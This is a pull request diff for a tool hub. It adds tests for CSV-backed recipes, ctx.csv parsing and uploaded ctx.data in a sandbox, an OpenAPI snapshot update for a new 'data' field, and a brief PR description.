+    assert r.status_code == 200, r.text
+    assert r.json()["output"] == {"rows": [{"company": "Figma", "country": "us"}, {"company": "Notion", "country": "us"}], "count": 2}
+    hit = fake_provider.hits[-1]
+    assert hit.path == "/spreadsheets/d/abc/export" and ("format", "csv") in hit.query and "authorization" not in hit.headers
+
+
+async def test_the_uploaded_csv_recipe_serves_its_own_data_with_no_call(
+    matrix_clients: AsyncClient, fake_provider: FakeProvider, platform_on, hub_on,
+):
+    import json as _json
+    from pathlib import Path
+    folder = Path(__file__).resolve().parents[2] / "docs" / "hub-recipes" / "data-csv"
+    body = {"manifest": _json.loads((folder / "recipe.json").read_text()), "script": (folder / "run.js").read_text(),
+            "check": _json.loads((folder / "check.json").read_text()), "readme": (folder / "README.md").read_text(),
+            "data": (folder / "data.csv").read_text()}
+    hits = len(fake_provider.hits)
+    pub = await matrix_clients.post("/hub/tools", json=body)
+    assert pub.status_code == 201 and pub.json()["status"] == "live", pub.text
+    tool_id = pub.json()["tool_id"]
+    r = await matrix_clients.post(f"/call/{tool_id}", json={"column": "plan", "equals": "enterprise"})
+    assert r.status_code == 200, r.text
+    assert r.json()["output"]["count"] == 2 and [x["company"] for x in r.json()["output"]["rows"]] == ["Figma", "Supabase"]
+    assert r.json()["usage"]["steps"] == 0 and len(fake_provider.hits) == hits      # no call at all
+    mine = (await matrix_clients.get("/hub/tools/mine")).json()[0]
+    assert mine["data"] == {"rows": 5, "bytes": len((folder / "data.csv").read_text().encode())}
+    assert "data uploaded with the tool: 5 rows" in (await matrix_clients.get(f"/hub/{tool_id}")).text
+    # a bad CSV is refused by field and rule; a CSV on a steps recipe too
+    bad = await matrix_clients.post("/hub/tools", json={**body, "data": "just one line"})
+    assert bad.status_code == 422 and bad.json()["detail"]["field"] == "data"

--- a/tests/snapshots/openapi.json
+++ b/tests/snapshots/openapi.json
@@ -778,6 +778,18 @@
             "title": "Check",
             "type": "object"
           },
+          "data": {
+            "anyOf": [
+              {
+                "maxLength": 50000000,
+                "type": "string"
+              },
+              {
+                "type": "null"
+              }
+            ],
+            "title": "Data"
+          },
           "manifest": {
             "additionalProperties": true,
             "title": "Manifest",
@@ -1555,6 +1567,18 @@
             "additionalProperties": true,
             "title": "Check",
             "type": "object"
+          },
+          "data": {
+            "anyOf": [
+              {
+                "maxLength": 50000000,
+                "type": "string"
+              },
+              {
+                "type": "null"
+              }
+            ],
+            "title": "Data"
           },
           "inputs": {
             "additionalProperties": true,

--- a/tests/test_hub_sandbox.py
+++ b/tests/test_hub_sandbox.py
@@ -133,3 +133,23 @@ async def test_two_runs_in_parallel_do_not_mix():
         _run("export default async function run(ctx) { return { who: ctx.inputs.who }; }", {"who": "b"}),
     )
     assert a[0] == {"who": "a"} and b[0] == {"who": "b"}
+
+
+async def test_ctx_csv_parses_quotes_commas_and_newlines():
+    out, _ = await _run(r'''
+export default async function run(ctx) {
+  const rows = ctx.csv('name,note,n\r\n"Doe, Jane","said ""hi""\nthen left",3\nBob,,4\n');
+  return { rows, n: rows.length };
+}''')
+    assert out["n"] == 2
+    assert out["rows"][0] == {"name": "Doe, Jane", "note": 'said "hi"\nthen left', "n": "3"}
+    assert out["rows"][1] == {"name": "Bob", "note": "", "n": "4"}
+
+
+async def test_ctx_data_carries_the_uploaded_rows():
+    log: list[str] = []
+    out = await run_script("export default async function run(ctx) { return { n: ctx.data.length, first: ctx.data[0] }; }",
+                           {}, wall_s=10, execute=_echo, log=log, data=[{"a": "1", "b": "x"}, {"a": "2", "b": "y"}])
+    assert out == {"n": 2, "first": {"a": "1", "b": "x"}}
+    out2, _ = await _run("export default async function run(ctx) { return { d: ctx.data }; }")
+    assert out2 == {"d": None}


### PR DESCRIPTION
Phase 7.5 of the tool hub: the URL target (allowed under a uses tool's base URL, refused elsewhere), ctx.csv, the uploaded data.csv as ctx.data (migration 0030), two example recipes (public Google Sheet, uploaded CSV). Suite 2940; Postgres 16 verified.

